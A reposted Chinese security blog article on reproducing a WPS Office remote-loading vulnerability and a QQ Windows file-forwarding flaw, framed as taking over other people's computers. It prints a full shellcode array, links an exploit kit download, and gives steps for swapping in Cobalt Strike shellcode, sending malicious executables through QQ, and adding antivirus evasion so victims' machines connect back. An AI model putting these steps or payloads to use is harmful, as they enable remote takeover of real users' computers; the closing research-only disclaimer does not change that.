wps漏洞与qq漏洞复现加远程上线别人电脑

admin
admin
admin
138107
文章
113
评论
2023年9月11日11:34:43评论66 views字数 1948阅读6分29秒阅读模式


wps漏洞

wps漏洞与qq漏洞复现加远程上线别人电脑

影响范围

WPS Office 2023 个人版 <=12.1.0.15120
WPS Office机构版本 <= 11.8.2.12055

原理

通过wps文件的某种远程加载机制去调用互联网上的资源,其中被调用的资源必须恶意满足域名格式为clientweb.docer.wps.cn.{xxxxx}wps.cn,其中{xxx}是什么都行,然后通过修改docx的某项配置文件中的特定属性,让docx打开时去调用相关文件并加载其中的恶意代码,复现工具包(包括wps软件加触发代码加详解步骤)

链接:

https://pan.baidu.com/s/1Kzw9FbvtvhioHxGp25B2wQ

提取码:3hm8

--来自百度网盘超级会员V3的分享

复现过程弹出计算机

1.首先在虚拟机上面安装wps,然后在本地修改hosts文件(测试写死的)127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn,然后将在1.html当前路径下启动http server并监听80端口,然后双击打开wps就会本地弹出计算机。

2.分析1.html里面代码,发现弹出的计算机的代码完全是由以下决定:

const shellcode = new Uint8Array([0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30,0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff,0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52,0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01, 0xd1,0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b,0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03,0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b,0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24,0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb,0x8d, 0x5d, 0x6a, 0x01, 0x8d, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x50, 0x68, 0x31, 0x8b, 0x6f,0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x68, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5,0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a,0x00, 0x53, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x00]);

3.如何让其上线cs,直接打开cs然后构造一个shellcode替换以上代码,然后双击打开wps就会被上线。

qq漏洞复现

wps漏洞与qq漏洞复现加远程上线别人电脑

影响范围:QQ Windows版9.7.13及以前版本

漏洞所在功能模块:文档传输下载模块

漏洞攻击效果:远程代码执行

原理

该漏洞为逻辑漏洞,腾讯QQ windows客户端的“文件传输消息”在经过“回复消息”功能处理后,该文件会变为无需任何弹窗确认,点击消息文本后即可自动下载并打开文件的处理方式。

复现

准备两个qq号,准备1.bat文件,文件的内容为calc,这里文件不一定为bat,也可以为exe,后面讲用cs上线直接一个exe恶意程序。

然后由自己把1.bat文件发给好友

wps漏洞与qq漏洞复现加远程上线别人电脑

另外一个qq看到后右键打开回复

wps漏洞与qq漏洞复现加远程上线别人电脑

然后自己接受到另外一个自己号发的回复后,将这个回复消息转发给其他人点击,就会弹出计算机。

wps漏洞与qq漏洞复现加远程上线别人电脑

如何上其他电脑上线?

直接打开cs,生成一个exe恶意软件,实战中会被杀,最好用写点免杀,然后同样操作发给其他人,cs上面就会看到其他人被上线。

wps漏洞与qq漏洞复现加远程上线别人电脑

关注微信公众号 领取复现视频

原文始发于微信公众号(0到1渗透测试):wps漏洞与qq漏洞复现加远程上线别人电脑

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月11日11:34:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   wps漏洞与qq漏洞复现加远程上线别人电脑https://cn-sec.com/archives/2021929.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息